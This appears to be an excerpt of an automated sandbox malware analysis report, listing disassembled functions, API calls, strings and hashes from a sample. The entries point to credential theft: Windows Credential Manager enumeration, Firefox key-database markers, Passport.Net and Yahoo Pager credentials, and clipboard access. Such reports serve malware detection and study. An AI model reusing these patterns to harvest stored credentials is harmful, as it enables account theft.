                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                        • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                      • API String ID: 2726666094-3614832568
                                                                                      • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                      • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                      • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                      • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                      APIs
                                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                      • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                      • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                      • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2014771361-0
                                                                                      • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                      • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                      • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                      • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                      APIs
                                                                                      • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                        • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                      • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                      • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                      • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcmp$memcpy
                                                                                      • String ID: global-salt$password-check
                                                                                      • API String ID: 231171946-3927197501
                                                                                      • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                      • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                      • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                      • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                      APIs
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??3@
                                                                                      • String ID:
                                                                                      • API String ID: 613200358-0
                                                                                      • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                      • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                      • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                      • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                      APIs
                                                                                      • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                      • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                      • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                      • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                      • EndPaint.USER32(?,?), ref: 004016F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                      • String ID:
                                                                                      • API String ID: 19018683-0
                                                                                      • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                      • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                      • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                      • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040644F
                                                                                      • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                      • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                        • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$memset
                                                                                      • String ID:
                                                                                      • API String ID: 438689982-0
                                                                                      • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                      • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                      • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                      • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0044495F
                                                                                      • memset.MSVCRT ref: 00444978
                                                                                      • memset.MSVCRT ref: 0044498C
                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                      • strlen.MSVCRT ref: 004449A8
                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                      • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpymemset$strlen
                                                                                      • String ID:
                                                                                      • API String ID: 2142929671-0
                                                                                      • Opcode ID: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                      • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                      • Opcode Fuzzy Hash: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                      • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                      APIs
                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                      • strlen.MSVCRT ref: 0040F7BE
                                                                                      • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                      • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                      • String ID: Passport.Net\*
                                                                                      • API String ID: 2329438634-3671122194
                                                                                      • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                      • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                      • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                      • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                      APIs
                                                                                        • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                      • memset.MSVCRT ref: 0040330B
                                                                                      • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                      • strchr.MSVCRT ref: 0040335A
                                                                                        • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                      • strlen.MSVCRT ref: 0040339C
                                                                                        • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                      • String ID: Personalities
                                                                                      • API String ID: 2103853322-4287407858
                                                                                      • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                      • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                      • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                      • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00444573
                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValuememset
                                                                                      • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                      • API String ID: 1830152886-1703613266
                                                                                      • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                      • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                      • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                      • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                      APIs
                                                                                      Strings
                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                      • API String ID: 3510742995-272990098
                                                                                      • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                      • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                      • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                      • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID: H
                                                                                      • API String ID: 2221118986-2852464175
                                                                                      • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                      • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                      • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                      • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                      • API String ID: 3510742995-3170954634
                                                                                      • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                      • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                      • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                      • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$memset
                                                                                      • String ID: winWrite1$winWrite2
                                                                                      • API String ID: 438689982-3457389245
                                                                                      • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                      • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                      • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                      • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpymemset
                                                                                      • String ID: winRead
                                                                                      • API String ID: 1297977491-2759563040
                                                                                      • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                      • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                      • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                      • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0044955B
                                                                                      • memset.MSVCRT ref: 0044956B
                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpymemset
                                                                                      • String ID: gj
                                                                                      • API String ID: 1297977491-4203073231
                                                                                      • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                      • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                      • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                      • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                      APIs
                                                                                      • GetParent.USER32(?), ref: 004090C2
                                                                                      • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                      • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                      • String ID:
                                                                                      • API String ID: 4247780290-0
                                                                                      • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                      • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                      • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                      • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                      APIs
                                                                                      • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                        • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
